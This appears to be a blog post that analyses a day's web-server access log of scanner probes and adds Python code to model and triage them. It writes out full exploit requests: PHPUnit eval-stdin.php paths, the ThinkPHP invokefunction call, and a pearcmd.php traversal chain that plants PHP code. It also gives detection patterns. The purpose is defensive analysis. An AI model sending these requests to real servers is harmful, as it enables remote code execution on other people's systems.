Today's hacking attempts
"GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 943 "backend not found" "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 944 "backend not found" "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php"
"GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 945 "backend not found" "/vendor/phpunit/src/Util/PHP/eval-stdin.php"
"GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 946 "backend not found" "/vendor/phpunit/Util/PHP/eval-stdin.php"
"GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 947 "backend not found" "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php"
"GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 948 "backend not found" "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 949 "backend not found" "/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 950 "backend not found" "/phpunit/phpunit/Util/PHP/eval-stdin.php"
"GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 951 "backend not found" "/phpunit/src/Util/PHP/eval-stdin.php"
"GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 952 "backend not found" "/phpunit/Util/PHP/eval-stdin.php"
"GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 953 "backend not found" "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 954 "backend not found" "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php"
"GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 955 "backend not found" "/lib/phpunit/src/Util/PHP/eval-stdin.php"
"GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 956 "backend not found" "/lib/phpunit/Util/PHP/eval-stdin.php"
"GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 957 "backend not found" "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 958 "backend not found" "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 959 "backend not found" "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 960 "backend not found" "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 961 "backend not found" "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 962 "backend not found" "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 963 "backend not found" "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 964 "backend not found" "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 965 "backend not found" "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 966 "backend not found" "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 967 "backend not found" "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 968 "backend not found" "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 969 "backend not found" "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 970 "backend not found" "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 971 "backend not found" "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 972 "backend not found" "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 973 "backend not found" "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 974 "backend not found" "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 975 "backend not found" "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 976 "backend not found" "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 977 "backend not found" "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 978 "backend not found" "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 979 "backend not found" "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 980 "backend not found" "/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello"
"GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 981 "backend not found" "/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello"
"GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php"
"GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 983 "backend not found" "/index.php?lang=../../../../../../../../tmp/index1"
"GET /.env HTTP/1.1" 404 19 "-" "Mozilla/5.0 (X11; Linux x86_64)" 984 "backend not found" "/.env"
"GET / HTTP/1.1" 404 19 "-" "Hello World" 985 "backend not found" "/"
"GET /admin/login.asp HTTP/1.1" 404 19 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 986 "backend not found" "/admin/login.asp"
"GET /admin/login.asp HTTP/1.1" 404 19 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 987 "backend not found" "/admin/login.asp"
"GET /favicon.ico HTTP/1.1" 404 19 "http://119.205.236.169/admin/login.asp" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 988 "backend not found" "/favicon.ico"
Today, as every day, the log recorded attempts from several countries to push the door open and walk in. Leaving a data trail at the application level is no longer optional; it is a requirement. If you start a project with haphazard, rule-of-thumb development, doing this and that roughly, it feels fast at first, but as the system grows you can watch it gradually drag. That is why logs matter so much. Every request above got a 404 with a 19-byte body and "backend not found" in the backend field: nothing behind the proxy matched, so the scanner learned nothing, but the log still tells us exactly what it was looking for.
Log Analysis
1. PHPUnit Exploits
PHPUnit is a unit-testing framework written in PHP. Attackers routinely look for servers where PHPUnit was installed as a Composer dependency and the vendor/ directory ended up reachable over HTTP, because one of its files gives remote code execution. (The flaw is in PHPUnit, not in PHP: CVE-2017-9841 affects PHPUnit before 4.8.28 and 5.x before 5.6.3. The vendor/ directory holds every package Composer pulled in, development tools included, which is why scanners go straight for it.)
- File discovery: the scanner requests eval-stdin.php under many candidate prefixes (vendor/, lib/, laravel/, yii/, zend/, public/, admin/, ...) to learn whether the file exists. The vulnerable version of that file reads the raw HTTP request body and passes it to eval(), so a GET with no body is only an existence check; the real exploit is a POST whose body is PHP code. Every probe here returned 404, so nothing was found. Paths seen include:
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php /phpunit/phpunit/src/Util/PHP/eval-stdin.php /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
- Mitigation: install production dependencies with composer install --no-dev, keep vendor/ outside the document root (or deny it in the web server), and upgrade PHPUnit.
2. ThinkPHP Exploits
ThinkPHP is a PHP web framework that is popular in China. Attackers routinely try its known remote code execution bugs.
- Controller-name abuse leading to remote code execution: the s= route parameter names the framework's internal class \think\app and its invokefunction method, which then calls call_user_func_array with attacker-chosen arguments. ThinkPHP 5.0.x before 5.0.23 and 5.1.x before 5.1.31 did not validate the controller name in the route, so this worked without authentication. The callback here is deliberately harmless: md5 of "Hello". If the response had contained that digest, the scanner would know the target is exploitable and come back with system instead of md5. Both the site root and /public/ (ThinkPHP's default document root) were tried:
/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello
3. Directory Traversal and Local File Inclusion (LFI)
A directory traversal attack tries to reach files outside the web root. Here it is combined with file inclusion to turn a file read into code execution.
- Traversal plus include via pearcmd.php: the two requests form one chain. The lang parameter is presumably passed to include() with .php appended, so the first request walks up to / and includes /usr/local/lib/php/pearcmd.php, PEAR's command-line front end, which ships in the official PHP Docker images. With register_argc_argv enabled, PHP also splits the raw query string on + into argv, so pearcmd sees the command config-create /&/<?echo(md5("hi"));?> /tmp/index1.php and writes a config file containing that string to /tmp/index1.php. The second request includes /tmp/index1 (again with .php appended), which executes the planted code; the scanner then looks for md5("hi") in the response.
/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5("hi"));?>+/tmp/index1.php /index.php?lang=../../../../../../../../tmp/index1
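The chain above works because PHP reads one query string in two different ways at once. The following is an added example (my own, not code from the original post or from PHP/PEAR) that models those two views and walks both requests. Assumptions, all mine: the target does roughly include($_GET['lang'] . '.php') from a document root of /var/www/html, runs with register_argc_argv=On, and has pearcmd.php at /usr/local/lib/php/ as the official php Docker images do; the config-file content written by config-create is simplified to the one fact that matters, that the root string is copied verbatim.

```python
# Added example (not from the original post): how PHP sees the pearcmd request
# as $_GET and as argv at the same time, and what the two-request chain yields.
# Assumed environment: include($_GET['lang'] . '.php'), docroot /var/www/html,
# register_argc_argv=On, pearcmd.php at /usr/local/lib/php/ (php Docker images).
import hashlib
import posixpath
from urllib.parse import unquote_plus

# The two query strings from the log, in order.
REQ1 = ('lang=../../../../../../../../usr/local/lib/php/pearcmd'
        '&+config-create+/&/<?echo(md5("hi"));?>+/tmp/index1.php')
REQ2 = 'lang=../../../../../../../../tmp/index1'


def php_get(query):
    """Model $_GET: split on '&', '+' becomes a space, percent-decode."""
    params = {}
    for pair in query.split('&'):
        key, _, value = pair.partition('=')
        params[unquote_plus(key)] = unquote_plus(value)
    return params


def php_argv(query):
    """Model php_build_argv(): with register_argc_argv=On, PHP splits the *raw*
    QUERY_STRING on '+' only. '&' is not special here and nothing is decoded,
    so the same bytes give a completely different view than $_GET."""
    return [part for part in query.split('+') if part]


def resolve_include(docroot, lang):
    """The file that include($_GET['lang'] . '.php') opens after normalisation."""
    return posixpath.normpath(posixpath.join(docroot, lang + '.php'))


def pearcmd_config_create(argv):
    """pearcmd.php 'config-create <root> <file>': every path setting is built
    from <root> and the result is written to <file>. pearcmd treats argv[0] as
    the script name and ignores it, which is why the 'lang=...&' chunk is
    harmless. Simplified model: only the verbatim copy of <root> is kept."""
    args = argv[1:]
    if len(args) != 3 or args[0] != 'config-create':
        raise ValueError('not a config-create invocation')
    root, filename = args[1], args[2]
    content = '#PEAR_Config 0.9\nphp_dir=' + root + '/pear/php\n'  # simplified
    return filename, content


def run_chain(docroot='/var/www/html'):
    """Walk both requests; return what a defender wants to know: which files
    were touched and which digest the scanner will grep the response for."""
    files = {}
    # Request 1: include pearcmd.php, which then runs with our argv.
    included1 = resolve_include(docroot, php_get(REQ1)['lang'])
    filename, content = pearcmd_config_create(php_argv(REQ1))
    files[filename] = content
    # Request 2: include the file that request 1 just planted.
    included2 = resolve_include(docroot, php_get(REQ2)['lang'])
    planted = files.get(included2, '')
    canary = hashlib.md5(b'hi').hexdigest() if 'md5("hi")' in planted else None
    return {'include_1': included1, 'written': filename,
            'include_2': included2, 'canary': canary}


if __name__ == '__main__':
    print(php_get(REQ1))
    print(php_argv(REQ1))
    print(run_chain())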
4. Environment file access attempt
The .env file holds environment configuration (database credentials, API keys, application secrets), and exposing it is a serious security risk.
- Environment file access attempt: requests the server's .env file directly to obtain sensitive information. The User-Agent, a bare "Mozilla/5.0 (X11; Linux x86_64)", is a stripped-down string that real browsers do not send on its own, so this is a tool, not a person.
/.env
5. Default page and admin login page access
Attackers often visit the default page and administration pages to fingerprint the application, look for an authentication bypass, or try default credentials.
- Default page fetch: GET / with the User-Agent "Hello World", a made-up value that no browser sends, so this is a tool checking whether anything answers at all.
/ HTTP/1.1" 404 19 "-" "Hello World
- Admin login page probe: two requests for /admin/login.asp, a generic wordlist entry; both got 404.
/admin/login.asp
- Favicon request: this one is not a probe. Browsers fetch /favicon.ico automatically after rendering a page, and the Referer (http://119.205.236.169/admin/login.asp) shows exactly that: Chrome 126 on macOS loaded the 404 page for /admin/login.asp and then asked for the icon. Together with the full browser User-Agent, this points to a person visiting by IP address rather than a scanner, which is worth keeping apart from the automated traffic above.
/favicon.ico
Logs like these show attempts to discover and exploit vulnerabilities in the server. The scanning followed a predictable pattern (one client, sequential request numbers, the same wordlist of paths), so it is easy to pick out of the log and to act on: make sure vendor/ and .env are never served, keep the frameworks patched, and block sources that keep coming back. Identifying such attempts in the log and taking appropriate measures is what matters.
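As an added example covering all five sections above (my own code, not part of the original post or of any existing tool), here is a small triage pass over the access-log format shown in this post: it parses each line, labels it with the attack family discussed, computes the md5 canary the scanner expects back (for the ThinkPHP and pearcmd probes), and separates the wordlist scanner from the single browser visit. The sample lines are constructed to mirror the page's format rather than copied from a live server (the Referer host is a TEST-NET address), and the category names are my own labels.

```python
# Added example (not from the original post): triage of the access-log format
# shown above. SAMPLE_LOG is constructed to match that format; category names
# are my own labels.
import hashlib
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(
    r'^"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) '
    r'(?P<size>\d+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)" (?P<seq>\d+) '
    r'"(?P<backend>[^"]*)"'
)

SAMPLE_LOG = [  # constructed sample lines, same shape as the post's log
    r'"GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 943 "backend not found" "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"',
    r'"GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 980 "backend not found" "/index.php"',
    r'"GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5("hi"));?>+/tmp/index1.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 982 "backend not found" "/index.php"',
    r'"GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 983 "backend not found" "/index.php"',
    r'"GET /.env HTTP/1.1" 404 19 "-" "Mozilla/5.0 (X11; Linux x86_64)" 984 "backend not found" "/.env"',
    r'"GET / HTTP/1.1" 404 19 "-" "Hello World" 985 "backend not found" "/"',
    r'"GET /admin/login.asp HTTP/1.1" 404 19 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 986 "backend not found" "/admin/login.asp"',
    r'"GET /favicon.ico HTTP/1.1" 404 19 "http://203.0.113.10/admin/login.asp" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 988 "backend not found" "/favicon.ico"',
]


def parse_line(line):
    """One log line to a dict; None for lines in another format."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev['status'], ev['seq'] = int(ev['status']), int(ev['seq'])
    parts = urlsplit(ev['target'])
    ev['path'], ev['query'] = parts.path, parts.query
    return ev


def classify(ev):
    """Map a request to the families discussed above; most specific first."""
    path, query = ev['path'], ev['query']
    if path.endswith('/eval-stdin.php'):
        return 'phpunit-eval-stdin'        # CVE-2017-9841 existence probe
    if 'invokefunction' in query and 'call_user_func_array' in query:
        return 'thinkphp-invokefunction'   # ThinkPHP 5.x RCE probe
    if 'pearcmd' in query and 'config-create' in query:
        return 'lfi-pearcmd-write'         # stage 1: plant a file via pearcmd.php
    if '../' in query:
        return 'lfi-traversal-include'     # stage 2, or any other traversal
    if path == '/.env':
        return 'env-file-probe'
    if path.endswith('/favicon.ico') and ev['referer'] != '-':
        return 'browser-auto-favicon'      # browsers do this after rendering a page
    if path.startswith('/admin/'):
        return 'admin-path-probe'
    if path == '/' and not ev['ua'].startswith('Mozilla/'):
        return 'recon-root-fetch'
    return 'other'


def expected_canary(ev):
    """Digest the scanner will grep for if the exploit ran: md5 of X from
    vars[0]=md5&vars[1][]=X (ThinkPHP) or from md5("X") in a pearcmd payload.
    Seeing this value in an outgoing response body means the exploit worked."""
    qs = parse_qs(ev['query'])
    if qs.get('vars[0]') == ['md5'] and qs.get('vars[1][]'):
        return hashlib.md5(qs['vars[1][]'][0].encode()).hexdigest()
    m = re.search(r'md5\("([^"]*)"\)', ev['target'])
    if m:
        return hashlib.md5(m.group(1).encode()).hexdigest()
    return None


def triage(lines):
    events = []
    for line in lines:
        ev = parse_line(line)
        if ev is not None:
            ev['category'] = classify(ev)
            ev['canary'] = expected_canary(ev)
            events.append(ev)
    return events


def noisy_clients(events, threshold=3):
    """User-Agents that collected `threshold` or more 404s: in this log that is
    the fingerprint of a scanner walking a wordlist with sequential seq numbers."""
    hits = Counter(e['ua'] for e in events if e['status'] == 404)
    return {ua: n for ua, n in hits.items() if n >= threshold}


if __name__ == '__main__':
    evs = triage(SAMPLE_LOG)
    for e in evs:
        print(f"{e['seq']:4} {e['category']:<24} canary={e['canary']} {e['target'][:60]}")
    print(Counter(e['category'] for e in evs))
    print(noisy_clients(evs))
```

The canary values are the useful part for response-side monitoring: a WAF or egress rule that looks for 8b1a9953c4611296a827abf8c47804d7 (md5 of "Hello") or 49f68a5c8493ec2c0bf489821c21fc3b (md5 of "hi") in response bodies catches a successful exploit even when the request slipped through. The favicon rule is deliberately separate so the browser visit is not counted against the scanner.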